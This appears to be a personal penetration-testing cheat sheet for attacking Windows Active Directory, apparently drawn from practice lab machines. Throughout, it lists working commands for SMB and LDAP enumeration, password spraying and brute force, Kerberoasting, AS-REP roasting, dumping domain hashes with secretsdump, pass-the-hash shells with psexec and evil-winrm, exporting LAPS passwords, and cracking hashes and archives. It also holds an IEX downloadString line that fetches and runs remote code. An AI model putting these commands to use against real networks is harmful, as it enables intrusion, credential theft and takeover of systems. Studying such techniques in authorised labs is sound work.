# smb enum
- port 139 445
smbmap -H # no pwd
smbmap -H -d domain -u user -p pwd # pwd
smbclient -N -L \\\\ # no pwd
smbclient -N \\\\\\Shares # interactive
smbclient -W domain -U user //$ # pwd
enum4linux -a
msf5 auxiliary(scanner/smb/pipe_auditor) > run
msf5 auxiliary(scanner/smb/smb_lookupsid) > run
rpcclient -U bhult
> enumdomusers
> enumprivs
> enumprinters
- pwd spray
cme smb -d domain -u users.txt -p Password4
- brute
hydra -L users.lst -P wordlist.lst smb
- change pwd
smbpasswd -U bhult -r
- mount
mount -t cifs // /mnt/smb -v -o domain=dom,user=user,pass=pwd
- mount in win
net use j: \\hathor\share /u:windcorp.htb\BeatriceMill pwd
net use * /del /y

# ldap enum
- port 389 636 3268
nmap -sT -Pn -n --open -p389 --script ldap-rootdse
ldapsearch -x -h -D 'windcorp\BeatriceMill' -w 'pwd'  -b "CN=Users,DC=windcorp,DC=htb"
ldapsearch -x -h -p 389 -D 'domain\user' -w 'pwd' -b "dc=active,dc=htb" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountNamePage
GetADUsers.py -all active.htb/user:pwd -dc-ip
- export LAPS
cme ldap -u svc_deploy -p 'pwd' --kdcHost timelapse.htb -M laps

# dns enum
- port 53
dig srv _ldap._tcp.dc._msdcs.domain @

# kerberos
- port 88
kerbrute userenum -d spookysec.local --dc userlist.txt
- enum user hashes & kerberos keys
secretsdump.py spookeysec.local/backup:[email protected] -just-dc  # exported hash can be used to get shell
- ASREPRoasting, Getting TGT for svc-admin
GetNPUsers.py -dc-ip spookysec.local/svc-admin -no-pass
- tgs/spn
GetUserSPNs.py domain/user:pass -dc-ip -request
john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
- get shell
psexec.py domain/user:[email protected]
psexec.py [email protected] -hashes hash
smbexec.py domain/[email protected] -hashes hash
wmiexec.py domain/[email protected]

# winRM
- port 5985 5986
evil-winrm -i -u user -H hash
evil-winrm -i -u user -p 'pwd'
evil-winrm -i -S -c cert.crt -k prv.key

# common
- gen dict from url
cewl -d 5 -m 5 -w wordlist.lst url --with-numbers
- gpp Groups.xml crack
gpp-decrypt hash
- share files
smbserver.py tools .
copy \\\tools\file .
certutil -encode xx.zip encoded.txt
- download file
IEX(New-Object Net.WebClient).downloadString('')
- check NTLM hash
hashid 9cb01504ba0247ad5c6e08f7ccae7903
- show share
net view
- crack pfx pwd
crackpkcs12 -d /usr/share/wordlists/rockyou.txt x.pfx
- export cert from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
- export private key from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
- crack zip
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt orcharddb.zip